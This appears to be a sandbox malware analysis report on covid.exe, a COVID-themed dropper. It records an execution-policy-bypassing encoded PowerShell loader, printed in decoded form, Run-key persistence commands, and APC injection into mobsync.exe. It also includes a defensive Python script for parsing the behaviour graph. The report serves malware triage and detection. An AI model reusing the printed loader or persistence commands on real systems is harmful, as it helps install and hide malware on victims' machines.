Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\covid.exe Process created: Base64 decoded $x='838c6397-aa6a-4c2e-af18-018c880c33bb';$y='C:\Users\hardz\Desktop\covid.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Thread APC queued: target process: C:\Windows\System32\mobsync.exe
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23A00BA0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23F81490000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 2212C2E0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686065C70 cpuid 13_2_00007FF686065C70
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 13_2_00007FF686061F44
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 13_2_00007FF686061DDC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 13_2_00007FF686061EAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW, 13_2_00007FF68605EF2C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 13_2_00007FF686062398
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_00007FF6860624C4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 13_2_00007FF686062190
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 13_2_00007FF68605E9AC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 13_2_00007FF686061A90
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_00007FF6860622E8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 18_2_00007FF6FE121F44
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 18_2_00007FF6FE121DDC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 18_2_00007FF6FE121EAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW, 18_2_00007FF6FE11EF2C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 18_2_00007FF6FE122398
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 18_2_00007FF6FE1224C4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 18_2_00007FF6FE11E9AC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 18_2_00007FF6FE122190
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 18_2_00007FF6FE121A90
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 18_2_00007FF6FE1222E8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 29_2_00007FF7E3D824C4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 29_2_00007FF7E3D82398
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 29_2_00007FF7E3D822E8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 29_2_00007FF7E3D81A90
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 29_2_00007FF7E3D7E9AC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 29_2_00007FF7E3D82190
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 29_2_00007FF7E3D81F44
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW, 29_2_00007FF7E3D7EF2C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 29_2_00007FF7E3D81EAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 29_2_00007FF7E3D81DDC
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\covid.exe Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048288 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 13_2_00007FF686048288
Note: the GetSystemTimeAsFileTime / GetCurrentThreadId / GetCurrentProcessId / QueryPerformanceCounter sequence is the one the MSVC C runtime's __security_init_cookie uses to seed the /GS stack cookie at start-up. It is present in nearly every MSVC-built PE and is not evidence of sample-specific behaviour; it only tells you the dropped payload was compiled with MSVC.
Behavior Graph ID: 379751   Sample: covid.exe   Startdate: 01/04/2021   Architecture: WINDOWS   Score: 100

Signatures attached to the sample node: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Potential dropper URLs found in powershell memory; 2 other signatures

Process tree recovered from the graph (graph node ids in brackets; the numbers the graph prints after a process name are its created-registry-value / created-file counts; "->" lists the DNS/IP endpoints contacted by that process):

[9] covid.exe 2
    dropped: C:\Users\user\AppData\Local\...\covid.exe.log, ASCII
    signatures: Malicious encrypted Powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy
    [19] powershell.exe 1 36
        dropped: C:\Users\user\AppData\...\buyonegetone.exe, PE32+; PowerShell_transcr....20210401080426.txt, UTF-8
        signatures: Uses cmd line tools excessively to alter registry or file data; Powershell drops PE file
        [36] buyonegetone.exe
            signatures: Early bird code injection technique detected; Writes to foreign memory regions; Allocates memory in foreign processes; Queues an APC in another process (thread injection)
            [50] mobsync.exe
                [57] WerFault.exe -> 13.88.21.125 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
            [52] conhost.exe
        [39] iexplore.exe 6 85 -> www.who.int
            [54] iexplore.exe -> fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35, 443, 49708, 49709 HIGHWINDS2US United States; 108.177.15.154 GOOGLEUS United States; 23 other IPs or domains
        [42] conhost.exe
        [48] 2 other processes
[13] buyonegetone.exe
    signatures: Early bird code injection technique detected; Writes to foreign memory regions; Allocates memory in foreign processes
    [23] mobsync.exe
        [44] WerFault.exe -> 168.61.161.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
    [25] conhost.exe
[15] buyonegetone.exe
    [27] mobsync.exe
        [46] WerFault.exe -> 192.168.2.1 unknown unknown
    [29] conhost.exe
[17] buyonegetone.exe
    [31] mobsync.exe -> 168.62.194.64 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
    [34] conhost.exe

Reading the tree: every mobsync.exe instance is a child of a buyonegetone.exe instance that carries the early-bird injection signatures, so mobsync.exe (a legitimate Windows binary) is the injection host, not a stand-alone payload. Of the endpoints listed, only 168.62.194.64 is reached by a mobsync.exe instance itself; the three WerFault.exe connections are spawned from mobsync.exe instances that crashed, and everything reached by iexplore.exe belongs to the www.who.int page that powershell.exe opened.
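The flattened graph text above can be parsed back into a process tree mechanically, which is useful when many such reports have to be triaged. The following script is an added example written for this page, not part of the Joe Sandbox report or its tooling. It embeds the graph text of this analysis as a constructed input, rebuilds the nodes from the "ID label SRC->ID [started|dropped]" fragments (a format assumption inferred from this page alone), recovers the process chain behind each node, and attributes every DNS/IP endpoint to the process that reached it, so that the browser traffic from the www.who.int page and the WerFault.exe crash reports can be separated from the endpoint reached by an injected mobsync.exe. All function names and the "noise" process list are choices made here.

```python
"""Rebuild a Joe Sandbox behavior graph from its flattened text and attribute endpoints to processes."""
import re

# Constructed input: the graph of analysis ID 379751 as flattened on the page; only line breaks were added.
GRAPH_TEXT = r"""
behaviorgraph top1 signatures2 2 Behavior Graph ID: 379751 Sample: covid.exe Startdate: 01/04/2021 Architecture: WINDOWS Score: 100
82 Antivirus / Scanner detection for submitted sample 2->82 84 Multi AV Scanner detection for submitted file 2->84
86 Potential dropper URLs found in powershell memory 2->86 88 2 other signatures 2->88 9 covid.exe 2 2->9 started
13 buyonegetone.exe 2->13 started 15 buyonegetone.exe 2->15 started 17 buyonegetone.exe 2->17 started
process3 file4 64 C:\Users\user\AppData\Local\...\covid.exe.log, ASCII 9->64 dropped 102 Malicious encrypted Powershell command line found 9->102
104 Encrypted powershell cmdline option found 9->104 106 Bypasses PowerShell execution policy 9->106 19 powershell.exe 1 36 9->19 started
108 Early bird code injection technique detected 13->108 110 Writes to foreign memory regions 13->110 112 Allocates memory in foreign processes 13->112
23 mobsync.exe 13->23 started 25 conhost.exe 13->25 started 27 mobsync.exe 15->27 started 29 conhost.exe 15->29 started
31 mobsync.exe 17->31 started 34 conhost.exe 17->34 started signatures5 process6 dnsIp7
60 C:\Users\user\AppData\...\buyonegetone.exe, PE32+ 19->60 dropped 62 PowerShell_transcr....20210401080426.txt, UTF-8 19->62 dropped
90 Uses cmd line tools excessively to alter registry or file data 19->90 92 Powershell drops PE file 19->92
36 buyonegetone.exe 19->36 started 39 iexplore.exe 6 85 19->39 started 42 conhost.exe 19->42 started 48 2 other processes 19->48
44 WerFault.exe 23->44 started 46 WerFault.exe 27->46 started 80 168.62.194.64 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->80
file8 signatures9 process10 dnsIp11 94 Early bird code injection technique detected 36->94 96 Writes to foreign memory regions 36->96 98 Allocates
memory in foreign processes 36->98 100 Queues an APC in another process (thread injection) 36->100
50 mobsync.exe 36->50 started 52 conhost.exe 36->52 started 72 www.who.int 39->72 54 iexplore.exe 39->54 started
74 168.61.161.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->74 76 192.168.2.1 unknown unknown 46->76
signatures12 process13 dnsIp14 57 WerFault.exe 50->57 started
66 fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35, 443, 49708, 49709 HIGHWINDS2US United States 54->66
68 108.177.15.154 GOOGLEUS United States 54->68 70 23 other IPs or domains 54->70
process15 dnsIp16 78 13.88.21.125 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 57->78
"""

NODE_RE = re.compile(
    r"(?<!\S)(\d+)\s+"             # node id as a standalone token
    r"((?:(?!\d+->\d+).)+?)\s+"    # label, matched lazily and never across an edge
    r"(\d+)->\1\b"                 # the edge whose target is this node
    r"(?:\s+(started|dropped))?",  # graph keyword: started process or dropped file
    re.S)
ROOT_RE = re.compile(r"(?<!\S)(\d+)\s+(Behavior Graph ID: \d+.*?Score: \d+)", re.S)
HOST_RE = re.compile(r"[\w-]+(?:\.[\w-]+)+")  # dotted hostname or IPv4 literal

def classify(label, keyword):
    """Node kind from the graph keyword, otherwise from the shape of the label."""
    if keyword:
        return "process" if keyword == "started" else "file"
    first = label.split()[0]
    if first.isdigit():  # "2 other signatures" / "23 other IPs or domains" summaries
        return "other"
    return "network" if HOST_RE.fullmatch(first) else "signature"

def parse_graph(text):
    """Return {node_id: {"label", "kind", "parent"}}; the root node has parent None."""
    root = ROOT_RE.search(text)
    nodes = {int(root.group(1)): {"label": " ".join(root.group(2).split()),
                                  "kind": "root", "parent": None}}
    for node_id, label, parent, keyword in NODE_RE.findall(text):
        label = " ".join(label.split())  # re-join labels that were broken across lines
        nodes[int(node_id)] = {"label": label, "kind": classify(label, keyword),
                               "parent": int(parent)}
    return nodes

def ancestry(nodes, node_id):
    """Process names from the first-started process down to node_id."""
    chain = []
    while nodes[node_id]["parent"] is not None:
        if nodes[node_id]["kind"] == "process":
            chain.append(nodes[node_id]["label"].split()[0])
        node_id = nodes[node_id]["parent"]
    return chain[::-1]

def network_by_process(nodes):
    """{process node id: [endpoint labels]} for every process that touched the network."""
    out = {}
    for node_id in sorted(nodes):
        if nodes[node_id]["kind"] == "network":
            out.setdefault(nodes[node_id]["parent"], []).append(nodes[node_id]["label"])
    return out

def injected_host_connections(nodes, noise=("iexplore.exe", "WerFault.exe")):
    """Endpoints reached by anything other than the browser that was pointed at www.who.int
    and Windows Error Reporting, each with the process chain that led to it."""
    hits = []
    for pid, endpoints in network_by_process(nodes).items():
        if nodes[pid]["label"].split()[0] not in noise:
            hits += [(" > ".join(ancestry(nodes, pid)), ep) for ep in endpoints]
    return hits

def render_tree(nodes, node_id=None, depth=0):
    """Indented process tree listing each process's signatures, drops and endpoints."""
    if node_id is None:
        node_id = next(nid for nid, n in nodes.items() if n["kind"] == "root")
    lines = ["    " * depth + f"[{node_id}] {nodes[node_id]['label']}"]
    for kid in sorted(nid for nid, n in nodes.items() if n["parent"] == node_id):
        if nodes[kid]["kind"] == "process":
            lines += render_tree(nodes, kid, depth + 1)
        else:
            lines.append("    " * (depth + 1) + f"- {nodes[kid]['kind']}: {nodes[kid]['label']}")
    return lines

if __name__ == "__main__":
    graph = parse_graph(GRAPH_TEXT)
    print("\n".join(render_tree(graph) + [f"{c} -> {e}" for c, e in injected_host_connections(graph)]))
```

Run as a script it prints the tree and then one line, buyonegetone.exe > mobsync.exe reaching 168.62.194.64, because that is the only endpoint whose parent process is neither the browser nor WerFault.exe. The noise list is a triage shortcut, not a verdict: the "23 other IPs or domains" node under the second iexplore.exe is a summary the graph does not expand, so the full network section still has to be read before anything it hides is dismissed.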

Contacted Public IPs

IP               Domain                                    Country        ASN    ASN Name                       Malicious
108.177.15.154   unknown                                   United States  15169  GOOGLEUS                       false
23.111.9.35      fontawesome-cdn.fonticons.netdna-cdn.com  United States  33438  HIGHWINDS2US                   false
172.217.168.68   unknown                                   United States  15169  GOOGLEUS                       false
13.88.21.125     unknown                                   United States  8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false
172.217.168.3    unknown                                   United States  15169  GOOGLEUS                       false
172.217.168.1    unknown                                   United States  15169  GOOGLEUS                       false
172.217.168.2    googleads.g.doubleclick.net               United States  15169  GOOGLEUS                       false
168.61.161.212   unknown                                   United States  8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false
65.9.58.114      unknown                                   United States  16509  AMAZON-02US                    false
172.217.168.54   unknown                                   United States  15169  GOOGLEUS                       false
199.232.136.157  platform.twitter.map.fastly.net           United States  54113  FASTLYUS                       false
168.62.194.64    unknown                                   United States  8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false

Private

IP
192.168.2.1

Contacted Domains

Name                                      IP               Active
googleads.g.doubleclick.net               172.217.168.2    true
fontawesome-cdn.fonticons.netdna-cdn.com  23.111.9.35      true
platform.twitter.map.fastly.net           199.232.136.157  true
www.who.int                               unknown          unknown
m.addthis.com                             unknown          unknown
v1.addthisedge.com                        unknown          unknown
www.clarity.ms                            unknown          unknown
s7.addthis.com                            unknown          unknown
z.moatads.com                             unknown          unknown
static.doubleclick.net                    unknown          unknown
use.fontawesome.com                       unknown          unknown
cdn.who.int                               unknown          unknown
platform.twitter.com                      unknown          unknown
www.youtube.com                           unknown          unknown
c.clarity.ms                              unknown          unknown